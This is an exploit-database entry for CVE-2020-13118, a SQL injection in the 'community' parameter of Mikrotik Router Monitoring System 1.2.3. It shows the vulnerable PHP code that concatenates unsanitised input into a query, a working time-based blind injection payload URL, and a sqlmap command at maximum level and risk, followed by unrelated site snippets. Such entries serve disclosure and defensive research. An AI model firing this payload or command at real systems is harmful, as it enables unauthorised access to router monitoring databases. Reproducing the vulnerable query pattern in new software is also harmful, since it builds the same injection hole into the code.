Search for hundreds of thousands of exploits

"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection"

Author

Exploit author

jul10l1r4

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-05-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Author: jul10l1r4 (Julio Lira)
# Google Dork: N/A
# Date: 2020-05-16
# Vendor Homepage: https://mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: <= 1.2.3
# Tested on: Debian 10 buster
# CVE: 2020-13118
Description: SQL Injection found in check_community.php:49

$community = $_GET['community'];
$_SESSION['community'] = $community;
$query = "SELECT name from router where `community`='
$community'";

PoC:

http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI

SQLmap using:
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3
Release DateTitleTypePlatformAuthor
2020-05-18"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection"webappshardwarejul10l1r4
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48474/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.